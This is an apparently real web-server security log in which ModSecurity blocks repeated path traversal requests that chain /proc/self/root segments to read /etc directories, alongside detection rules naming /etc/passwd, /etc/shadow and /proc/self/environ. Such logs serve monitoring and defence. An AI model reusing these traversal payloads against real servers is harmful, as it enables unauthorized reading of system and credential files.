[Mon Mar 16 13:59:20.107039 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.244.31:36668] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg26Jqj1wV0Si-Okef1twAAAA0"]
[Mon Mar 16 13:59:24.405858 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:37096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg27Jqj1wV0Si-Okef1vwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:04.001759 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:50700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3EbysWC90G-1nBrBLsAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:29.238115 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.243.203:54156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3LaQpVkWug9HeOt88GgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:44.819414 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.243.203:40850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3PKQpVkWug9HeOt88KgAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:45.743044 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.243.203:38324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3PaQpVkWug9HeOt88LQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:49.697803 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.243.203:38328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3QaTCbgAP5jq5TegxiQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:51.048294 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:51596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Q6QpVkWug9HeOt88LgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:51.943935 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:34234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Q7ABkC4fWIHEf8H1cAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:52.380446 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:51600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3RI6lpbStxTqkSktzSwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:53.759518 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:51610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3RZqj1wV0Si-Okef16gAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:55.155679 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:51622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3R1ajLEzk2WiQ-10ZGgAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:57.571757 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:51636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3SdSswJuvopo3lOhlrQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:00:58.871903 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:51648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3So6lpbStxTqkSktzTAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:00.216812 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:54478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3TJqj1wV0Si-Okef17QAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:01.956914 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.243.203:54492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3TaTCbgAP5jq5TegxlwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:03.489632 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:54494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3T5qj1wV0Si-Okef17wAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:04.853613 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:54510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3UNSswJuvopo3lOhlrwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:06.118025 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:54522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3Uo6lpbStxTqkSktzTwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:07.476114 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:54536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3U3jZBu2q05ozVU9gBwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:08.984559 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.243.203:54538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3VFajLEzk2WiQ-10ZIAAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:10.415886 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:54760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3VnjZBu2q05ozVU9gCwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:01:11.916479 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:54770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg3V5qj1wV0Si-Okef18AAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
